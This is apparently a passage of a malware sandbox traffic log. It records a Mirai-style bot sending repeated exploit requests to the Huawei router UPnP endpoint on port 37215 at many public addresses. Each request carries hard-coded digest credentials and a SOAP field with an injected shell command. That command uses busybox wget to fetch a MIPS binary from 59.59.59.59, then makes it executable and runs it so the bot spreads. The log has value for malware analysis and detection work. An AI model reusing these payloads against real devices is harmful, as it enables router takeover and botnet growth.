                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          187192.168.2.1536166148.86.24.18137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:45.552479029 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          188192.168.2.1545376197.96.17.10537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:45.552527905 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          189192.168.2.156088093.169.254.13437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:45.552568913 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          190192.168.2.154165241.144.119.6437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:45.552572012 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          191192.168.2.1545896197.237.92.437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:45.552639961 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          192192.168.2.155595268.110.168.5537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:45.552639961 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          193192.168.2.1560042157.89.33.9337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:45.552653074 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          194192.168.2.1551958157.64.54.20137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:45.553215981 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          195192.168.2.1546942157.163.65.6337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:45.553268909 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          196192.168.2.154612436.90.207.21637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:45.553268909 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 